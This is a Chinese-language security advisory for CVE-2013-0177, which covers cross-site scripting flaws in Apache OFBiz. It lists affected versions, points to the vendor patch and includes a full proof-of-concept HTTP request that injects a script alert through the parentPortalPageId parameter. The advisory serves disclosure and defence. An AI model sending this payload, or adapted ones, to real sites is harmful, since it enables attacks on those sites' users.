发布日期:2013-01-18
更新日期:2013-01-24
受影响系统:
Apache Group OfBiz 10.4.2
Apache Group OfBiz 10.4.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57463
CVE(CAN) ID: CVE-2013-0177
Apache Open For Business(Apache OFBiz)是开源的ERP系统。
Apache OFBiz 10.04.05、11.04.02之前版本存在多个跨站脚本漏洞,攻击者可利用这些漏洞在受影响站点的用户浏览器中执行任意HTML和脚本代码。
<*来源:Juan Caillava
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
GET
/exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE"&gt;&lt;script&gt;alert("xss")&lt;/script&gt;
HTTP/1.1
Host: :8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101
Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Connection: keep-alive
Referer: https://www.example.com:8443/exampleext/control/main?externalLoginKey=EL367731470037
Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1; OFBiz.Visitor=10002
建议:
--------------------------------------------------------------------------------
厂商补丁:
Apache Group
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: